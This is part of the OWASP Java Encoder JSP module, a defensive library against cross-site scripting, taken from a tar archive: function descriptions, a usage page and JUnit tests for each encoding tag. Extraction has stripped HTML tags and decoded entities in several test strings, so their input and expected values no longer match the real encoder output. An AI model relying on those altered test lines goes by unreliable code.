forHtmlAttribute org.owasp.encoder.Encode java.lang.String forHtmlAttribute(java.lang.String) forHtmlAttribute(unsafeData) Encodes for unquoted HTML attribute values. forHtml(String) or forHtmlAttribute(String) should usually be preferred over this method as quoted attributes are XHTML compliant. forHtmlUnquotedAttribute forHtmlUnquotedAttribute org.owasp.encoder.Encode java.lang.String forHtmlUnquotedAttribute(java.lang.String) forHtmlUnquotedAttribute(unsafeData) Encodes for CSS strings. The context must be surrounded by quotation characters. It is safe for use in both style blocks and attributes in HTML. forCssString forCssString org.owasp.encoder.Encode java.lang.String forCssString(java.lang.String) forCssString(unsafeData) Encodes for CSS URL contexts. The context must be surrounded by "url()". It is safe for use in both style blocks and attributes in HTML. Note: this does not do any checking on the quality or safety of the URL itself. The caller should insure that the URL is safe for embedding (e.g. input validation) by other means. forCssUrl forCssUrl org.owasp.encoder.Encode java.lang.String forCssUrl(java.lang.String) forCssUrl(unsafeData) Performs percent-encoding of a URL according to RFC 3986. The provided URL is assumed to a valid URL. This method does not do any checking on the quality or safety of the URL itself. In many applications it may be better to use java.net.URI instead. Note: this is a particularly dangerous context to put untrusted content in, as for example a "javascript:" URL provided by a malicious user would be "properly" escaped, and still execute. forUri forUri org.owasp.encoder.Encode java.lang.String forUri(java.lang.String) forUri(unsafeData) Performs percent-encoding for a component of a URI, such as a query parameter name or value, path or query-string. In particular this method insures that special characters in the component do not get interpreted as part of another component. forUriComponent forUriComponent org.owasp.encoder.Encode java.lang.String forUriComponent(java.lang.String) forUriComponent(unsafeData) Encodes for XML and XHTML. forXml forXml org.owasp.encoder.Encode java.lang.String forXml(java.lang.String) forXml(unsafeData) Encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those methods. forXmlContent forXmlContent org.owasp.encoder.Encode java.lang.String forXmlContent(java.lang.String) forXmlContent(unsafeData) Encodes for XML and XHTML attribute content. forXmlAttribute forXmlAttribute org.owasp.encoder.Encode java.lang.String forXmlAttribute(java.lang.String) forXmlAttribute(unsafeData) Encodes data for an XML CDATA section. On the chance that the input contains a terminating "]]&gt;", it will be replaced by &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. As with all XML contexts, characters that are invalid according to the XML specification will be replaced by a space character. Caller must provide the CDATA section boundaries. forCDATA forCDATA org.owasp.encoder.Encode java.lang.String forCDATA(java.lang.String) forCDATA(unsafeData) Encodes for a JavaScript string. It is safe for use in HTML script attributes (such as onclick), script blocks, JSON files, and JavaScript source. The caller MUST provide the surrounding quotation characters for the string. forJavaScript forJavaScript org.owasp.encoder.Encode java.lang.String forJavaScript(java.lang.String) forJavaScript(unsafeData) owasp-java-encoder-1.2.3/jsp/src/site/000077500000000000000000000000001375203724500175415ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/site/markdown/000077500000000000000000000000001375203724500213635ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/site/markdown/index.md000066400000000000000000000016751375203724500230250ustar00rootroot00000000000000## OWASP JSP The OWASP JSP Encoder is a collection of high-performance low-overhead contextual encoders that, when utilized correctly, is an effective tool in preventing Web Application security vulnerabilities such as Cross-Site Scripting (XSS). Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) for more information on preventing XSS. ### JSP Usage The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that includes tags and a set of JSP EL functions: ```xml org.owasp.encoder encoder-jsp 1.2.2 ``` ```JSP <%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> <%-- ... --%>

    Dynamic data via EL: ${e:forHtml(param.value)}

    Dynamic data via tag:

    ``` owasp-java-encoder-1.2.3/jsp/src/site/site.xml000066400000000000000000000031431375203724500212300ustar00rootroot00000000000000 owasp-java-encoder-1.2.3/jsp/src/test/000077500000000000000000000000001375203724500175545ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/test/java/000077500000000000000000000000001375203724500204755ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/test/java/org/000077500000000000000000000000001375203724500212645ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/000077500000000000000000000000001375203724500224155ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/000077500000000000000000000000001375203724500240345ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/000077500000000000000000000000001375203724500246075ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java000066400000000000000000000056231375203724500305020ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import junit.framework.TestCase; import org.springframework.mock.web.MockHttpServletRequest; import org.springframework.mock.web.MockHttpServletResponse; import org.springframework.mock.web.MockPageContext; import org.springframework.mock.web.MockServletContext; /** * EncodingTagTest is the base class for all unit tests for the tags. * This sets up the ServletContext so that tags can be tested. * * @author Jeremy Long (jeremy.long@gmail.com) */ public abstract class EncodingTagTest extends TestCase { protected MockServletContext _servletContext; protected MockPageContext _pageContext; protected MockHttpServletRequest _request; protected MockHttpServletResponse _response; /** * Constructor for the EncodingTagTest * @param testName the name of the test */ public EncodingTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); _servletContext = new MockServletContext(); _request = new MockHttpServletRequest(); _response = new MockHttpServletResponse(); _pageContext = new MockPageContext(_servletContext, _request, _response); } @Override protected void tearDown() throws Exception { super.tearDown(); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java000066400000000000000000000053121375203724500302320ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForCDATATag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCDATATagTest extends EncodingTagTest { public ForCDATATagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForCDATATag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForCDATATag instance = new ForCDATATag(); String value = "
    ]]>
    "; String expected = "
    ]]]]>
    "; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java000066400000000000000000000053131375203724500313360ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForCssStringTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCssStringTagTest extends EncodingTagTest { public ForCssStringTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForCssStringTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForCssStringTag instance = new ForCssStringTag(); String value = "
    "; String expected = "\\3c div\\3e"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java000066400000000000000000000052661375203724500306410ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForCssUrlTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCssUrlTagTest extends EncodingTagTest { public ForCssUrlTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForCssUrlTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForCssUrlTag instance = new ForCssUrlTag(); String value = "\\';"; String expected = "\\5c\\27;"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected, results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java000066400000000000000000000053371375203724500322150ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForHtmlAttributeTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlAttributeTagTest extends EncodingTagTest { public ForHtmlAttributeTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForHtmlAttributeTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForHtmlAttributeTag instance = new ForHtmlAttributeTag(); String value = "
    "; String expected = "<div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java000066400000000000000000000053261375203724500316620ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForHtmlContentTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlContentTagTest extends EncodingTagTest { public ForHtmlContentTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForHtmlContentTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForHtmlContentTag instance = new ForHtmlContentTag(); String value = "
    "; String expected = "<div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java000066400000000000000000000052541375203724500303270ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForHtmlTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlTagTest extends EncodingTagTest { public ForHtmlTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForHtmlTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForHtmlTag instance = new ForHtmlTag(); String value = "
    "; String expected = "<div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } ForHtmlUnquotedAttributeTagTest.java000066400000000000000000000054561375203724500336650ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForHtmlUnquotedAttributeTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlUnquotedAttributeTagTest extends EncodingTagTest { public ForHtmlUnquotedAttributeTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForHtmlUnquotedAttributeTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForHtmlUnquotedAttributeTag instance = new ForHtmlUnquotedAttributeTag(); String value = "
    "; String expected = "<div> </div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java000066400000000000000000000054161375203724500333550ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForJavaScriptAttributeTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptAttributeTagTest extends EncodingTagTest { public ForJavaScriptAttributeTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForJavaScriptAttributeTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForJavaScriptAttributeTag instance = new ForJavaScriptAttributeTag(); String value = "
    \"\'"; String expected = "
    \\x22\\x27"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java000066400000000000000000000053571375203724500324500ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForJavaScriptBlockTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptBlockTagTest extends EncodingTagTest { public ForJavaScriptBlockTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForJavaScriptBlockTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForJavaScriptBlockTag instance = new ForJavaScriptBlockTag(); String value = "'\"\0"; String expected = "\\'\\\"\\x00"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java000066400000000000000000000053651375203724500326550ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF 